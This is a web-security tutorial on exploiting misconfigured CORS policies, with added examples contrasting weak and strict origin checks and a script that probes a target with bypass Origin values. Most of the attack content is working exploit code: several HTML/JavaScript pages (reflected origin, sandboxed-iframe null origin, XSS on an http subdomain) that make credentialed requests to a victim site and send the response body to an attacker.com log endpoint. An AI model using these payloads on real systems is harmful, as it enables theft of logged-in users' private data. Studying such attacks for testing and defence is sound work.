CORS (Cross-Origin Resource Sharing) Attack
CORS (Cross-Origin Resource Sharing) is a browser mechanism that lets a web page request restricted resources from an origin other than the one the page itself was served from. A CORS attack abuses a misconfigured CORS policy on the server so that a page under the attacker's control can read those resources, including responses that carry the victim's cookies.
Bypass Restriction
Assume that https://example.com (https://vulnerable.com in the examples below) restricts cross-origin access with CORS. The goal is to find an Origin header value that the server's origin check accepts and reflects in Access-Control-Allow-Origin, ideally together with Access-Control-Allow-Credentials: true so that the victim's cookies are sent with the request.
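The bypasses in the sections that follow all come from sloppy server-side origin checks. The following is an added example (not code from the original page) that puts a typical flawed check next to a strict exact-match allowlist and shows which Origin values each one lets through. The host names vulnerable.com and attacker.com are placeholders, and the TRUSTED allowlist is an assumption.

```javascript
// Added example, not from the original page: a flawed CORS origin check
// next to a strict one. Host names are placeholders.

const TRUSTED = ['https://vulnerable.com', 'https://app.vulnerable.com']; // assumption

// Flawed check, the kind of logic behind the bypasses on this page:
// - substring match lets "https://vulnerable.com.attacker.com" and
//   "https://evilvulnerable.com" through
// - "null" is accepted, so sandboxed iframes and file:// pages are trusted
// - the scheme is stripped, so an http:// subdomain is trusted
function allowOriginWeak(origin) {
  if (origin === 'null') return true;
  const host = origin.replace(/^https?:\/\//, '');
  return host.includes('vulnerable.com');
}

// Strict check: exact match against an allowlist, scheme included.
function allowOriginStrict(origin) {
  return TRUSTED.includes(origin);
}

// Build the CORS response headers for a request carrying `origin`.
// Returns {} when the origin is rejected, so no ACAO header is emitted.
function corsHeaders(origin, allow) {
  if (!allow(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Origin values used by the techniques below (constructed sample input).
const BYPASS_ORIGINS = [
  'https://vulnerable.com.attacker.com',
  'https://evilvulnerable.com',
  'null',
  'http://subdomain.vulnerable.com',
];

function main() {
  for (const origin of [...TRUSTED, ...BYPASS_ORIGINS]) {
    console.log(origin.padEnd(40),
      'weak:', allowOriginWeak(origin), 'strict:', allowOriginStrict(origin));
  }
}

main();
```

The weak check accepts every origin in BYPASS_ORIGINS and reflects it with credentials enabled, which is exactly the response pattern the steps below look for; the strict check rejects all of them while still serving the two trusted origins. Vary: Origin is set on the strict variant so caches do not serve a response reflecting one origin to another.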
Origin Reflection
1. Change the Origin value of the request header, e.g. Origin: https://vulnerable.com.attacker.com
2. Check whether the response allows cross-origin access
If the Origin you sent is reflected in the response headers, together with Access-Control-Allow-Credentials: true, you can exploit it:
Access-Control-Allow-Origin: https://vulnerable.com.attacker.com
Access-Control-Allow-Credentials: true
3. Exploit with Your Malicious Web Page
For example, host it as "https://attacker.com/exploit" or "https://vulnerable.com.attacker.com/exploit".
Add the JavaScript code below to the web page.
When a logged-in victim visits the page, the browser attaches the victim's cookies to the cross-origin request, and the response body (the user's sensitive information from the target website) ends up in your server's log.
<script>
// Credentialed cross-origin request to the target; the victim's cookies
// are attached because withCredentials is set
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('GET', 'https://vulnerable.com/details', true);
req.withCredentials = true;
req.send();
// Send the response body to the attacker's server (relative path, so it
// goes to the origin hosting this page)
function reqListener() {
  location = '/log?key=' + encodeURIComponent(this.responseText);
}
</script>
Null origin
1. Send a request with Origin: null
2. Check whether the response contains Access-Control-Allow-Origin: null (with Access-Control-Allow-Credentials: true)
3. Add the iframe below to your malicious web page
For example, host it as "https://attacker.com/exploit". A sandboxed iframe loaded from srcdoc has an opaque origin, so the request it makes carries Origin: null.
<iframe
sandbox="allow-scripts allow-top-navigation allow-forms"
srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('GET', 'https://vulnerable.com/details', true);
req.withCredentials = true;
req.send();
function reqListener() {
location = 'https://attacker.com/log?key=' + encodeURIComponent(this.responseText);
}
</script>"
></iframe>
Insecure Protocol
Some servers trust every subdomain of the target, including over plain http://. If you can run JavaScript on such a subdomain (for example through an XSS flaw on http://subdomain.vulnerable.com), you can issue the credentialed request from there.
1. Send a request with Origin: http://subdomain.vulnerable.com
2. Check whether the response allows that origin
3. Add the JavaScript code below to your malicious web page
It's hosted as "https://attacker.com/exploit". It redirects the victim to the XSS-vulnerable subdomain with the CORS payload injected into the productId parameter; the payload then runs with the trusted http origin.
<script>
document.location="http://subdomain.vulnerable.com/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.com/details',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker.com/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
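Steps 1 and 2 of the three techniques above (Origin Reflection, Null origin, Insecure Protocol) are the same probe with different Origin values. The following is an added example (not code from the original page) that generates those values for a target, sends each one, and classifies the Access-Control-Allow-Origin / Access-Control-Allow-Credentials pair that comes back. It assumes Node 18+ for the global fetch(); attacker.com and the sample host names are placeholders.

```javascript
// Added example, not from the original page: send the Origin values this
// page describes to a target and classify the CORS response headers.
// Needs Node 18+ for the global fetch(). All host names are placeholders.

const ATTACKER_DOMAIN = 'attacker.com'; // assumption: attacker-controlled domain

// Origin values worth trying against a target such as https://vulnerable.com.
function candidateOrigins(targetUrl) {
  const host = new URL(targetUrl).hostname;
  return [
    `https://${ATTACKER_DOMAIN}`,          // full reflection of any origin
    `https://${host}.${ATTACKER_DOMAIN}`,  // prefix check (startsWith) bypass
    `https://evil${host}`,                 // suffix check (endsWith) bypass
    'null',                                // sandboxed iframe / file:// pages
    `http://${host}`,                      // scheme not checked
    `http://subdomain.${host}`,            // insecure-protocol subdomain
  ];
}

// Classify a response to a request that carried `sentOrigin`.
// `headers` is a plain object; header-name case is ignored.
function classify(sentOrigin, headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const acao = h['access-control-allow-origin'];
  const credentialed =
    (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';

  if (acao === undefined) return 'not-allowed';
  // Browsers refuse credentialed responses with a wildcard, so '*' only
  // exposes data that was already readable without cookies.
  if (acao === '*') return 'wildcard-no-credentials';
  if (acao !== sentOrigin) return 'not-allowed';
  if (sentOrigin === 'null') {
    return credentialed ? 'null-origin-credentialed' : 'null-origin';
  }
  return credentialed ? 'reflected-credentialed' : 'reflected';
}

// Live probe: one request per candidate origin. Only runs when the
// CORS_TARGET environment variable names a target you are allowed to test.
async function probe(targetUrl) {
  const results = [];
  for (const origin of candidateOrigins(targetUrl)) {
    const res = await fetch(targetUrl, {
      headers: { Origin: origin },
      redirect: 'manual',
    });
    const headers = Object.fromEntries(res.headers.entries());
    results.push({ origin, verdict: classify(origin, headers) });
  }
  return results;
}

if (process.env.CORS_TARGET) {
  probe(process.env.CORS_TARGET)
    .then((r) => console.table(r))
    .catch((e) => console.error(e.message));
}
```

Run it as CORS_TARGET=https://vulnerable.com/details node probe.js. A verdict of reflected-credentialed for an attacker-controlled origin, or null-origin-credentialed, is the condition the exploit pages above depend on; reflected without credentials still exposes anything the endpoint returns to an anonymous request. The http:// candidates are only useful if you can actually run script on that origin, as in the Insecure Protocol section.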